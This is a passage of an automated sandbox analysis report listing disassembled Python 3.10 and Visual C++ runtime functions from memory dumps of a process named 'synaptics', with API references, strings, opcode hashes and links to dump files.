                                                                                                                                                                                                      • Instruction ID: 0c7a931e6fc5cd8dc23c8911e0e161981929c2001b71e2ef8df2268cf3467a8d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb1c89b68f94ef61595358d0ac695a392440a2ad6315b3be354970000f54dfc9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88F05471304208AFDF04DFA5CC41E9A77B6EF89354F048559F90C8BA21E636E9519B90
                                                                                                                                                                                                      Function 6C4D1450 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73C9A8,Cannot modify a string currently used,?,?,?,6C4D1E16), ref: 6C4D1492
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_String
                                                                                                                                                                                                      • String ID: @Btl$Cannot modify a string currently used
                                                                                                                                                                                                      • API String ID: 1450464846-907911337
                                                                                                                                                                                                      • Opcode ID: 9fb472ca092503a3421c695f109df25c978d90b91e4614abfb86159d624316a9
                                                                                                                                                                                                      • Instruction ID: ba50d3bc46c6268133cdb53c4e365ef7ca112fb75e28945aaf00b199e26554a3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9fb472ca092503a3421c695f109df25c978d90b91e4614abfb86159d624316a9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92F05C329582044A8910E53A6C16D81779C8B4233FF1887A9DC7846FD1EA22E011C5D2
                                                                                                                                                                                                      Function 73A8CA4D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31stringCOMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • DName::DName.LIBVCRUNTIME ref: 73A8CA5F
                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,??_C,00000004,?,73A8CE90,00000000,00000000,00000001,00000008), ref: 73A8CA71
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: NameName::strncmp
                                                                                                                                                                                                      • String ID: ??_C
                                                                                                                                                                                                      • API String ID: 3707088317-1959642359
                                                                                                                                                                                                      • Opcode ID: 89a8c5719f57dd9c4b367495814dbe254d04ec97fb57f7e024071506f29de6fc
                                                                                                                                                                                                      • Instruction ID: e11cbd2bd8ac87499cb70e42d5f62cc72f906616fc476e2285021c972580245c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89a8c5719f57dd9c4b367495814dbe254d04ec97fb57f7e024071506f29de6fc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85F0BE72600304AFE703CB55C847FD57BA9AB04B55F048051FA4C6F1D6D772D9408B51
                                                                                                                                                                                                      Function 6C4DDCB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 6C4DDC40: _PyObject_CallFunction_SizeT.PYTHON310(sOnns,utf-8,00000001,00000000,?,6C4D8859,?,?,6C4DDCC7,00000001,00000000,?,6C4D8859,00000000,?,6C4D8859), ref: 6C4DDC64
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,?,?,00000000,00000001,surrogates not allowed,?,?,?,?,?,?,?,?,00000000), ref: 6C4DDCE5
                                                                                                                                                                                                      • PyErr_SetString.PYTHON310(codec must pass exception instance,00000000,00000001,surrogates not allowed,?,?,?,?,?,?,?,?,00000000), ref: 6C4DDCFA
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • codec must pass exception instance, xrefs: 6C4DDCEF
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$CallFunction_ObjectObject_SizeString
                                                                                                                                                                                                      • String ID: codec must pass exception instance
                                                                                                                                                                                                      • API String ID: 2506844301-3174393782
                                                                                                                                                                                                      • Opcode ID: 3ac8b8b7b425201ca1c73f6e70017e9093e1d3ef3201052520a87e7c9f30f66f
                                                                                                                                                                                                      • Instruction ID: c2630af64a3d26501adf198ad5834a60e0803e949c35a07fce7f3e024c4ed637
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ac8b8b7b425201ca1c73f6e70017e9093e1d3ef3201052520a87e7c9f30f66f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69F0A771640108ABDF019E44FD01EA73B2AEBD0619F558018FC0C06B21E772AD74DBE0
                                                                                                                                                                                                      Function 6C473C40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\dictobject.c,00000661), ref: 6C473C6D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • D:\a\1\s\Objects\dictobject.c, xrefs: 6C473C5C
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C473C61
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\dictobject.c
                                                                                                                                                                                                      • API String ID: 376477240-1848062838
                                                                                                                                                                                                      • Opcode ID: a7742753e8e00ba0416d164f35213357bb9ac4e10d1429bdfc2c229a2108d5b1
                                                                                                                                                                                                      • Instruction ID: 9734b46b3de57e06de5b4aacbcbd8bf3a7845adc9db61f936935dc7a64a6d2e9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a7742753e8e00ba0416d164f35213357bb9ac4e10d1429bdfc2c229a2108d5b1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 33F0E276640208AFCF10DE90AC02F8537396B4532AF044644F81C0BBA1D732E4658BF1
                                                                                                                                                                                                      Function 6C491FE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyLong_AsLongAndOverflow.PYTHON310(?,?), ref: 6C491FF3
                                                                                                                                                                                                        • Part of subcall function 6C491EA0: _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\longobject.c,00000182,00000000), ref: 6C491ED9
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73BD78,Python int too large to convert to C long), ref: 6C49201D
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Python int too large to convert to C long, xrefs: 6C492016
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$FormatLongLong_ObjectOverflowString
                                                                                                                                                                                                      • String ID: Python int too large to convert to C long
                                                                                                                                                                                                      • API String ID: 1378213482-1537553212
                                                                                                                                                                                                      • Opcode ID: e08713fd19fb5b168ff288c47b7265b9c98b69a75407052dfc34177085a96f94
                                                                                                                                                                                                      • Instruction ID: a0084d0fcf3b1f606836e198b1c45a9e25267a64b3b4d7332ebdce86d9498a40
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e08713fd19fb5b168ff288c47b7265b9c98b69a75407052dfc34177085a96f94
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BCE09B779001146BC610A52ABC06D967B9D8BC517EF444535EC1C97E50FA31A918C6E6
                                                                                                                                                                                                      Function 6C48FF90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\listobject.c,000009D5), ref: 6C48FFD8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C48FFCC
                                                                                                                                                                                                      • D:\a\1\s\Objects\listobject.c, xrefs: 6C48FFC7
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\listobject.c
                                                                                                                                                                                                      • API String ID: 376477240-1334166624
                                                                                                                                                                                                      • Opcode ID: 9e046941dfbc99033be37148d449e0ff3953d006dc249160e40addecb3ae0e52
                                                                                                                                                                                                      • Instruction ID: fa76167f169753bf1503b775d4c91d6274c982035acc4ddb863e3cf99efbe765
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e046941dfbc99033be37148d449e0ff3953d006dc249160e40addecb3ae0e52
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BDF0E5313122049BEA00DA64C981E19B3A59B4231EB14495AF12C8BF92C722E8479BC1
                                                                                                                                                                                                      Function 6C4A0CE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,?), ref: 6C4A0CF7
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,bad argument type for built-in operation), ref: 6C4A0D14
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • bad argument type for built-in operation, xrefs: 6C4A0D08
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$ObjectStringSubtypeType_
                                                                                                                                                                                                      • String ID: bad argument type for built-in operation
                                                                                                                                                                                                      • API String ID: 3704358307-2291703510
                                                                                                                                                                                                      • Opcode ID: e28c9e6b34d4db416768409e9a3cd4e50cc16c2842b64c46a617217d721954db
                                                                                                                                                                                                      • Instruction ID: e4d15dd89c1c765692dd41cb3ebdee64d10728095a42a4aaa3b3f0af51b357eb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e28c9e6b34d4db416768409e9a3cd4e50cc16c2842b64c46a617217d721954db
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2CE04F76784218AB8F10EAE5BD41D8673AD976819B7484835F90DE7F01E321F91447F1
                                                                                                                                                                                                      Function 6C4A0C90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,?), ref: 6C4A0CA7
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,bad argument type for built-in operation), ref: 6C4A0CC4
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • bad argument type for built-in operation, xrefs: 6C4A0CB8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$ObjectStringSubtypeType_
                                                                                                                                                                                                      • String ID: bad argument type for built-in operation
                                                                                                                                                                                                      • API String ID: 3704358307-2291703510
                                                                                                                                                                                                      • Opcode ID: 3b19df2b5ca64601ff7f4ba00dc5c00ae3878de6fdb9c96170f0c3a60da04462
                                                                                                                                                                                                      • Instruction ID: 42918930568816bd1009a0b8e7c29e448259b854fbb23073a10c0cf1e072f47f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b19df2b5ca64601ff7f4ba00dc5c00ae3878de6fdb9c96170f0c3a60da04462
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6E04F72784218BF8E10E6E5AE41D86B3AD97541AB7444835FD0DE3F01E221F91057F1
                                                                                                                                                                                                      Function 73A8725A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 73A87266
                                                                                                                                                                                                      • _CxxThrowException.VCRUNTIME140(?,73A8EFF8), ref: 73A8728D
                                                                                                                                                                                                        • Part of subcall function 73A87550: __telemetry_main_return_trigger.VCRUNTIME140(Bad dynamic_cast!,00000000,?,?,?,73A87292,?,73A8EFF8), ref: 73A87580
                                                                                                                                                                                                        • Part of subcall function 73A87550: RaiseException.KERNEL32(E06D7363,00000001,00000003,73A87292,?,?,?,73A87292,?,73A8EFF8), ref: 73A875B0
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Access violation - no RTTI data!, xrefs: 73A8725D
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Exception$RaiseThrow__telemetry_main_return_triggerstd::__non_rtti_object::__construct_from_string_literal
                                                                                                                                                                                                      • String ID: Access violation - no RTTI data!
                                                                                                                                                                                                      • API String ID: 1667904068-2158758863
                                                                                                                                                                                                      • Opcode ID: 697efc26215c7dc0909749a84cbacbd9ffe2ec1badcc18cd58455990a4086f4d
                                                                                                                                                                                                      • Instruction ID: 51e50c8e0ba366da2a6ecaeb6a40ad6d7ee2f865b70515bc3e2d070473a3e178
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 697efc26215c7dc0909749a84cbacbd9ffe2ec1badcc18cd58455990a4086f4d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DFC012328042089FDB0BD6E48607ECD73B8A908140F200553EA60A711DF737FEA54B21
                                                                                                                                                                                                      Function 6C4D38E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\unicodeobject.c,00000AC4), ref: 6C4D391D
                                                                                                                                                                                                        • Part of subcall function 6C4D3640: _PyUnicode_Ready.PYTHON310(?), ref: 6C4D3655
                                                                                                                                                                                                        • Part of subcall function 6C4D3640: PyErr_NoMemory.PYTHON310 ref: 6C4D36C3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C4D3911
                                                                                                                                                                                                      • D:\a\1\s\Objects\unicodeobject.c, xrefs: 6C4D390C
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
